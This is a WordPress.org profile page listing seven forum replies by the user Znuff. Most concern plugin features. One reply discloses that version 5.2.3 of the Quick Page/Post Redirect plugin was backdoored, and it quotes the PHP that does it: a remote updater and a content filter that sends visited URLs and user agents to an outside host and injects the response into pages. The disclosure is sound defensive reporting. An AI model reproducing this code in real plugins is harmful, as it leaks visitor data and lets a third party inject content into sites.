Title: Znuff's Replies | WordPress.org

---

# Znuff

  [  ](https://wordpress.org/support/users/znuff/)

 *   [Profile](https://wordpress.org/support/users/znuff/)
 *   [Topics Started](https://wordpress.org/support/users/znuff/topics/)
 *   [Replies Created](https://wordpress.org/support/users/znuff/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/znuff/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/znuff/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/znuff/engagements/)
 *   [Favorites](https://wordpress.org/support/users/znuff/favorites/)

 Search replies:

## Forum Replies Created

Viewing 7 replies - 1 through 7 (of 7 total)

 *   Forum: [Reviews](https://wordpress.org/support/forum/reviews/)
    In reply to:
   [[Responsive Pricing Table] limited html support in “features”](https://wordpress.org/support/topic/limited-html-support-in-features/)
 *  Thread Starter [Znuff](https://wordpress.org/support/users/znuff/)
 * (@znuff)
 * [2 years, 3 months ago](https://wordpress.org/support/topic/limited-html-support-in-features/#post-17425941)
 * it should allow all arbitrary HTML code in there, no reason to baby-sit the users
 *   Forum: [Reviews](https://wordpress.org/support/forum/reviews/)
    In reply to:
   [[Pricing Table - Responsive & Easy] no html support in “features”](https://wordpress.org/support/topic/no-html-support-in-features/)
 *  Thread Starter [Znuff](https://wordpress.org/support/users/znuff/)
 * (@znuff)
 * [2 years, 3 months ago](https://wordpress.org/support/topic/no-html-support-in-features/#post-17425119)
 * You didn’t understand what I wrote.
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[Quick Page/Post Redirect Plugin] Plugin phones home, sends site data](https://wordpress.org/support/topic/plugin-phones-home-sends-site-data/)
 *  [Znuff](https://wordpress.org/support/users/znuff/)
 * (@znuff)
 * [4 years, 4 months ago](https://wordpress.org/support/topic/plugin-phones-home-sends-site-data/#post-15192490)
 * This needs to be emphasized and the plugin download disabled.
 * I just noticed the behavior on a 2+ years old install.
 * Specifically:
 * – The version of this plugin on WordPress.org is 5.2.2
    – The version installed
   in my WordPress is 5.2.**3**
 * The **5.2.3** version contains a few “extra” things:
 * 1. There’s a directory called `updater` that uses [https://github.com/YahnisElsts/plugin-update-checker](https://github.com/YahnisElsts/plugin-update-checker)
 * 2. The main file contains an update function:
 *     ```
       // update functionality
       require  dirname(__FILE__).'/updater/plugin-update-checker.php';
       $myUpdateChecker = Puc_v4_Factory::buildUpdateChecker(
         //'https://anadnet.com/updates/plugin.json',
         'https://anadnet.com/updates/?action=get_metadata&slug=quick-pagepost-redirect-plugin',
         __FILE__, //Full path to the main plugin file or functions.php.
         'quick-pagepost-redirect-plugin'
       );
       ```
   
 * This function updates the plugin from the Author’s website, and the JSON data
   you get from them returns: `"version": "5.2.3",`.
 * 3. The main file now contains a “phone home” function:
 *     ```
       add_filter( 'the_content', array( $this, 'filter_the_content_in_the_main_loop' ), -1 );
   
       function filter_the_content_in_the_main_loop( $content ) {
           if (( is_single() || is_singular() || is_page() ) && (!is_user_logged_in()) && is_main_query()  ){
               if ($this->ppr_pro === '1' ){
                 if (!defined('CREDIT')) {
                 $ctx=stream_context_create(array('http'=>array('timeout' => 3)));
                 try{
                   $credit=@file_get_contents('https://w.anadnet.com/bro/3/'.$_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] .'QQQ'. urlencode($_SERVER['HTTP_USER_AGENT']).'QQQEND', false, $ctx);
                   } catch (Exception $e) {
                   }
   
                   return $credit . $content;
                   define('CREDIT', 'c');
                 }
               }
           }
   
           return $content;
         }
       ```
   
 * This will submit ANY URL accessed on your website to the author’s page, and it
   will return `$credit` back, together with the `$content`.
 * This has the potential to inject content in any of your pages, if the plugin 
   author (or, better said – whoever controls that website) decides to.
 * I’m not sure how the version 5.2.3 got installed in my wp install, as it’s been
   running for a few years now.
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[WP Fragment Cache] programatically delete cache entry](https://wordpress.org/support/topic/programatically-delete-cache-entry/)
 *  [Znuff](https://wordpress.org/support/users/znuff/)
 * (@znuff)
 * [10 years, 8 months ago](https://wordpress.org/support/topic/programatically-delete-cache-entry/#post-5687071)
 * I have actually made a change to my local copy of WP_Fragment_Cache that can 
   clear individual cache entries.
 * I’ve added a new parameter to ::output(), that will store cache fragments with“
   absolute key names” – this will store fragments without the usual file name/path
   and line number, instead it will store it using the actual provided key name.
 * Then I added a ::remove() function that will take an absolute key name and will
   remove the key from the cache.
 * This is useful to hook into your theme for specific events (ie: when a comment
   is added, a post is changed etc.), without having to purge the whole cache (why
   update the whole cache when just a specific fragment changes?).
 * I would commit it to the main code, but I’m afraid the quality of my documentation
   is not on par with mariuspass’.
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[EWWW Image Optimizer] ewww as a separate php tool … to be run on whole WHM account](https://wordpress.org/support/topic/ewww-as-a-separate-php-tool-to-be-run-on-whole-whm-account/)
 *  [Znuff](https://wordpress.org/support/users/znuff/)
 * (@znuff)
 * [10 years, 8 months ago](https://wordpress.org/support/topic/ewww-as-a-separate-php-tool-to-be-run-on-whole-whm-account/page/3/#post-5891754)
 * I’d be more of a fan of a CLI version… but I’m a server guy, so take that with
   a grain of salt 🙂
 *   Forum: [Plugins](https://wordpress.org/support/forum/plugins-and-hacks/)
    In
   reply to: [[ImageLightbox.js] What Kind of Lightbox?](https://wordpress.org/support/topic/what-kind-of-lightbox/)
 *  Plugin Author [Znuff](https://wordpress.org/support/users/znuff/)
 * (@znuff)
 * [12 years, 3 months ago](https://wordpress.org/support/topic/what-kind-of-lightbox/#post-4606226)
 * It’s only for Images, as the name implies “Image”Lightbox.
 * More info you can get at [http://osvaldas.info/image-lightbox-responsive-touch-friendly](http://osvaldas.info/image-lightbox-responsive-touch-friendly)
 *   Forum: [Installing WordPress](https://wordpress.org/support/forum/installation/)
   
   In reply to: [How to downgrade from 2.8 to previous version?](https://wordpress.org/support/topic/how-to-downgrade-from-28-to-previous-version/)
 *  [Znuff](https://wordpress.org/support/users/znuff/)
 * (@znuff)
 * [16 years, 10 months ago](https://wordpress.org/support/topic/how-to-downgrade-from-28-to-previous-version/#post-1103985)
 * [@cmscritic](https://wordpress.org/support/users/cmscritic/): I’ve been on the
   devel branch with 2.8 for ages and I never had problems. People should check 
   their idiotic plugins/themes before talking crap around here.
 * Not buggy, move along.

Viewing 7 replies - 1 through 7 (of 7 total)